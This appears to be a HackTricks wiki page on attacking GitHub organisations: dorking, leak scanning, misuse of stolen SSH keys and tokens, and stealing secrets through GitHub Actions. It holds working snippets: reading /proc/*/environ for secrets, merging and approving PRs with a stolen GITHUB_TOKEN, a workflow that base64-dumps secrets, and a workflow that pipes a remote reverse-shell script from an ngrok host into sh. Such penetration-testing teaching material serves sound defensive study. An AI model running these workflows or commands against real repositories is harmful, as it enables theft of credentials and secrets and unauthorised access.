hacktricks/cloud-security/github-security
2021-12-02 12:01:09 +00:00
..
basic-github-information.md GitBook: [#2878] update 2021-11-30 18:06:32 +00:00
README.md GitBook: [#2885] update 2021-12-02 12:01:09 +00:00

Github Security

What is Github

(From here) At a high level, GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code.

Basic Information

{% content-ref url="basic-github-information.md" %} basic-github-information.md {% endcontent-ref %}

External Recon

Github repositories can be configured as public, private and internal.

  • Private means that only people of the organisation will be able to access them
  • Internal means that only people of the enterprise (an enterprise may have several organisations) will be able to access it
  • Public means that all internet is going to be able to access it.

In case you know the user, repo or organisation you want to target you can use github dorks to find sensitive information or search for sensitive information leaks on each repo.

Github Dorks

Github allows to search for something specifying as scope a user, a repo or an organisation. Therefore, with a list of strings that are going to appear close to sensitive information you can easily search for potential sensitive information in your target.

Tools (each tool contains its list of dorks):

Github Leaks

Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will download each repo and search for sensitive information in them (even checking certain depth of commits).

Tools (each tool contains its list of regexes):

Internal Recon

With User Credentials

If you somehow already have credentials for a user inside an organization you can just login and check which enterprise and organization roles you have, if you are a raw member, check which permissions raw members have, in which groups you are, which permissions you have over which repos, and how are the repos protected.

Note that 2FA may be used so you will only be able to access this information if you can also pass that check.

{% hint style="info" %} Note that if you manage to steal the user_session cookie (currently configured with SameSite: Lax) you can completely impersonate the user without needing credentials or 2FA. {% endhint %}

With User SSH Key

Github allows users to set SSH keys that will be used as authentication method to deploy code on their behalf (no 2FA is applied).

With this key you can perform changes in repositories where the user has some privileges, however you can not sue it to access github api to enumerate the environment. However, you can get enumerate local settings to get information about the repos and user you have access to:

# Go to the the repository folder
# Get repo config and current user name and email
git config --list

If the user has configured its username as his github username you can access the public keys he has set in his account in https://github.com/<github_username>.keys, you could check this to confirm the private key you found can be used.

SSH keys can also be set in repositories as deploy keys. Anyone with access to this key will be able to launch projects from a repository. Usually in a server with different deploy keys the local file ~/.ssh/config will give you info about key is related.

GPG Keys

As explained here sometimes it's needed to sign the commits or you might get discovered.

Check locally if the current user has any key with:

gpg --list-secret-keys --keyid-format=long

With User Token

For an introduction about User Tokens check the basic information.

A user token can be used instead of a password for Git over HTTPS, or can be used to authenticate to the API over Basic Authentication. Depending on the privileges attached to it you might be able to perform different actions.

A User token looks like this: ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123

With Oauth Application

With Github Application

With Malicious Github Action

For an introduction about Github Actions check the basic information.

In case you can execute arbitrary github actions in a repository, you can steal the secrets from that repo.

In case members of an organization can create new repos and you can execute github actions, you can create a new repo and steal the secrets set at organization level.

In case you somehow managed to infiltrate inside a Github Action, if you can escalate privileges you can steal secrets from the processes where secrets have been set in. In some cases you don't even need to escalate privileges.

cat /proc/<proc_number>/environ
cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret"

GITHUB_TOKEN

This "secret" (coming from ${{ secrets.GITHUB_TOKEN }} and ${{ github.token }}) is widely used to give (mostly read) to the Action access to the repo. This token is the same one a Github Application will use, so it can access the same endpoints: https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps

You can see the possible permissions of this token in: https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token

These tokens looks like this: ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7

Some interesting things you can do with this token:

# Merge PR
curl -X PUT
    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
    -H "Accept: application/vnd.github.v3+json" \
    --header "authorization: Bearer $GITHUB_TOKEN" \
    --header 'content-type: application/json' \
    -d '{"commit_title":"commit_title"}'

# Approve a PR
curl -X POST
    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
    -H "Accept: application/vnd.github.v3+json" \
    --header "authorization: Bearer $GITHUB_TOKEN" \
    --header 'content-type: application/json' \
    -d '{"event":"APPROVE"}'

{% hint style="danger" %} Note that in several occasions you will be able to find github user tokens inside Github Actions envs or in the secrets. These tokens may give you more privileges over the repository and organization. {% endhint %}

List secrets in Github Action output

name: list_env
on:
  workflow_dispatch:
jobs:     
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Need to base64 encode or github will change the secret value for "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}

Get reverse shell with secrets

name: revshell
on:
  workflow_dispatch:
jobs:     
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}

Bypassing Branch Protection